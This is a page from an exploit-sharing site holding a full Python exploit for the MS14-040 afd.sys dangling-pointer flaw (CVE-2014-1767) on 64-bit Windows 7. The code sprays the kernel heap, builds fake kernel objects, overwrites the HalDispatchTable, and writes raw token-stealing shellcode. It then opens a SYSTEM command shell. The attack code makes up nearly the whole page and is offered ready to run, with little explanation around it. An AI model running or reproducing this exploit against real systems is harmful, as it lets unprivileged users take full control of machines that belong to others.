0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: MS14-040 - AFD.SYS Dangling Pointer
# Date: 2016-03-03
# Exploit Author: Rick Larabee
# Vendor Homepage: www.microsoft.com
# Version: Windows 7, 64 bit
# Tested on: Win7 x64
# afd.sys - 6.1.7601.17514
# ntdll.dll - 6.1.7601.17514
#
# CVE : CVE-2014-1767
# Category: Local Privilege Escalation
# References:
# http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
# http://ricklarabee.blogspot.com/
# https://warroom.securestate.com/ms14-040-afd-sys-dangling-pointer-further-analysis/
# https://technet.microsoft.com/en-us/library/security/ms14-040.aspx
# http://www.cvedetails.com/cve/CVE-2014-1767/
# https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/
#
# Greetz: PWN4GEPWN1E, SecurityMook
from ctypes import *
import socket, time, os, struct, sys
from ctypes.wintypes import HANDLE, DWORD
import platform
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x40
Zerobits = c_int(0)
RegionSize = c_ulonglong(0x1000)
written = c_ulonglong(0)
FakeObjSize = 0x100
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
GENERIC_EXECUTE = 0x20000000
GENERIC_ALL = 0x10000000
INVALID_HANDLE_VALUE = -1
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
HalDispatchTable = c_uint64
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
kernel32.WriteProcessMemory.argtypes = [c_ulonglong, c_ulonglong, c_char_p, c_ulonglong, POINTER(c_ulonglong)]
ntdll.NtAllocateVirtualMemory.argtypes = [c_ulonglong, POINTER(c_ulonglong), c_ulonglong, POINTER(c_ulonglong),c_ulonglong,c_ulonglong]
def find_driver_base(driver=None):
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
lpImageBase = (c_ulonglong * 1024)()
lpcbNeeded = c_longlong()
Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32]
else:
#if process_is_wow64():
# raise RuntimeError('python running in WOW64 is not supported')
lpImageBase = (c_ulong * 1024)()
lpcbNeeded = c_long()
driver_name_size = c_long()
driver_name_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))
for base_addr in lpImageBase:
driver_name = c_char_p('\x00' * driver_name_size.value)
if base_addr:
Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value)
if driver == None and driver_name.value.lower().find("krnl") != -1:
return (base_addr, driver_name.value)
elif driver_name.value.lower() == driver:
return (base_addr, driver_name.value)
return None
def get_haldispatchtable():
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
kernel32.LoadLibraryExA.restype = c_uint64
kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
kernel32.GetProcAddress.restype = c_uint64
(krnlbase, kernelver) = find_driver_base()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
halDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
halDispatchTable -= hKernel
halDispatchTable += krnlbase
return halDispatchTable
def CreateBuffer1(inbuf1addr):
print "[+] Creating Buffer for IOCTL 0x1207F (afdTransmitFile) at: ", hex(inbuf1addr)
inbuf1size = 0x40
targetsize = 0x100
virtualAddress = 0x13371337
mdlsize = (pow(2, 0x0c) * (targetsize -0x30) / 8) - 0xfff - (virtualAddress & 0xfff)
inbuf1 = "\x41" * 0x20
inbuf1 += struct.pack("Q", virtualAddress) #0x1a
inbuf1 += struct.pack("Q", mdlsize)
inbuf1 += "\x42" * 4
inbuf1 += "\x43" * 4
inbuf1 += "\x01\x00\x00\x00"
inbuf1 += "\x00\x00\x00\x00"
inbuf1 += "\x00" * (inbuf1size - len(inbuf1))
baseadd = c_ulonglong(0x1001)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
wpmStatus = kernel32.WriteProcessMemory(-1, inbuf1addr, inbuf1, inbuf1size, byref(written))
def CreateBuffer2(inbuf2addr):
print "[+] Creating Buffer for IOCTL 0x120C3 (afdTransmitPacket) at: ", hex(inbuf2addr)
inbuf2size = 0x18
addrforbuf2 = 0x0AAAAAAA
inbuf2 = struct.pack("Q", 0x1)
inbuf2 += struct.pack("Q", addrforbuf2)
inbuf2 += "\x00" * (inbuf2size -len(inbuf2))
baseadd = c_ulonglong(inbuf2addr+1)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
kernel32.WriteProcessMemory(-1, inbuf2addr, inbuf2, inbuf2size, byref(written))
def CreateFakeObject(firstWrite,fakeobjectaddr, setinfoworkerfactory):
print "[+] Print creating fakeobject at ", hex(fakeobjectaddr)
fakeobject2addr = setinfoworkerfactory - 0x18
fakeobject2 = "\x00"*0x18 + struct.pack("Q", firstWrite)
fakeobj2size = len(fakeobject2)
kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written))
objhead = ("\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
fakeobject = objhead
fakeobject += struct.pack("Q", fakeobject2addr) + "\x41"*96
fakeobject += "\x42" * (FakeObjSize - len(fakeobject))
kernel32.WriteProcessMemory(-1, fakeobjectaddr, fakeobject, FakeObjSize, byref(written))
def main():
print "[+] creating socket..."
sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0)
if sock == -1:
print "[-] no luck creating socket!"
sys.exit(1)
print "[+] got sock 0x%x" % sock
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(135)
addr.sin_addr = socket.htonl(0x7f000001)
connect(sock, byref(addr), sizeof(addr))
print "[+] sock connected."
print "[+] fill kernel heap"
rgnarr = []
nBottomRect = 0x02aaaaaa
while(1):
hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1)
if hrgn == 0:
break
rgnarr.append(hrgn)
print ".",
print "\n[+] GO!"
HalDispatchTable = get_haldispatchtable()
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
# Win7 - x64
(halbase, dllname) = find_driver_base("hal.dll")
OS = "7"
if OS == "7":
HaliQuerySystemInformation = halbase+0x398e8 # Offset for win7 x64
_KPROCESS = "\x70"
_TOKEN = "\x08\x02"
_UPID = "\x80\x01"
_APLINKS = "\x88\x01"
print "[+] HaliQuerySystemInformation:", hex(HaliQuerySystemInformation)
IoStatus = c_ulonglong()
IoStatusBlock = c_ulonglong()
addrSetInfoWorkerFactory = 0x2218
firstWriteAddr = HalDispatchTable + 0x8 - 0x2C
secondWriteAddr = firstWriteAddr + 0x4
thirdWriteAddr = firstWriteAddr + 0x1
shellcode_address = c_ulonglong
shellcode_address = 0x0000000000002500
what_address = 0x0000250800002500
what_part1 = what_address & 0xfffffff
what_part2 = what_address >> 32 & 0xfffffff
inbuf1 = 0x1000
inbuf2 = 0x2000
hWF = c_ulonglong(0)
FakeWorkerFactoryADDR = 0x2100
CreateBuffer1(inbuf1)
CreateBuffer2(inbuf2)
CreateFakeObject(firstWriteAddr, FakeWorkerFactoryADDR, addrSetInfoWorkerFactory)
print ""
print ""
print "[*] Trigger IOCTL 0x1207f (afdTransmitFile) to setup the memory "
print "[*] structures for phase 2 and fil the freed space with a "
print "[*] WorkerFactory Object"
raw_input("[+] Press Enter to trigger phase 1")
ntdll.ZwDeviceIoControlFile.argtypes = [c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, POINTER(c_ulonglong),
c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
status = ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x1207f, inbuf1, 0x40, 0x0, 0x0)
kernel32.CreateIoCompletionPort.argtypes = [c_ulonglong,c_ulonglong,c_ulonglong,c_ulonglong]
CompletionPort = HANDLE(kernel32.CreateIoCompletionPort( INVALID_HANDLE_VALUE, 0, 0, 0))
ntdll.ZwCreateWorkerFactory.argtypes = [POINTER(c_ulonglong), c_ulonglong, c_ulonglong, c_void_p, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
ntdll.ZwCreateWorkerFactory(byref(hWF),GENERIC_ALL,0,CompletionPort,INVALID_HANDLE_VALUE,0,0,0,0,0)
hWFaddr = hWF
padding = "\x90"*8
HalDispatchTable0x8 = HalDispatchTable + 0x8
sc_pointer = struct.pack("Q", shellcode_address+0x10)
sc_pointer += struct.pack("Q", 0x25)
restore_ptrs = "\x41\x51" +\
"\x41\x52" +\
"\x41\x53" +\
"\x49\xb9" + struct.pack("Q", HaliQuerySystemInformation) +\
"\x49\xba" + struct.pack("Q", HalDispatchTable0x8) +\
"\x4d\x89\x0a"
tokenstealing = "\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00" +\
"\x4D\x8B\x89" + _KPROCESS + "\x00\x00\x00" +\
"\x4D\x89\xCA" +\
"\x4D\x8B\x89" + _APLINKS + "\x00\x00" +\
"\x49\x81\xE9" + _APLINKS + "\x00\x00" +\
"\x49\x83\xB9" + _UPID + "\x00\x00\x04" +\
"\x75\xe8" +\
"\x4D\x8B\x89" + _TOKEN + "\x00\x00" +\
"\x4D\x89\x8A" + _TOKEN + "\x00\x00"
fixobjheaders = "\x4d\x8b\x92\x00\x02\x00\x00" +\
"\x4d\x89\xd1" +\
"\x4d\x8b\x12" +\
"\x41\xbb" + struct.pack("L", hWF.value)+\
"\x41\x83\xe3\xfc" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xda" +\
"\x49\xc7\x02\x00\x00\x00\x00" +\
"\x49\x83\xc1\x58" +\
"\x4d\x89\xca" +\
"\x4d\x8b\x09" +\
"\x49\x83\xe9\x01" +\
"\x4d\x89\x0a" +\
"\x41\x5b" +\
"\x41\x5A" +\
"\x41\x59" +\
"\xc3"
shellcode = sc_pointer + padding + restore_ptrs + tokenstealing + fixobjheaders
shellcode_size = len(shellcode)
print "\n\n[+] Writing Shellcode at address: ", hex(shellcode_address)
kernel32.WriteProcessMemory(-1, shellcode_address, shellcode, shellcode_size, byref(written))
print "\n\n[*] Triggering IOCTL 0x120c3 (afdTransmitPackets) to free the"
print "[*] WorkerFactory object created above and fill the freed object"
print "[*] with a user controlled object to perform the necessary overwrites"
raw_input("[+] Press Enter to trigger phase 2")
### Trigger 2
## afd!AfdTransmitPackets
ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x120c3, inbuf2, 0x18, 0x0, 0x0)
ntdll.ZwQueryEaFile(INVALID_HANDLE_VALUE, byref(IoStatus), None, 0, False, FakeWorkerFactoryADDR, FakeObjSize-0x04, None, False)
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part1, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", secondWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", thirdWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4) ;
inp = c_long()
out = c_long()
inp = 0x1337
qip = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /K cd c:\\windows\\system32")
if __name__ == "__main__":
if platform.architecture()[0] == '64bit':
main()
else:
print "Please use a 64 bit version of python"
sys.exit()
# 0day.today [2025-01-07] #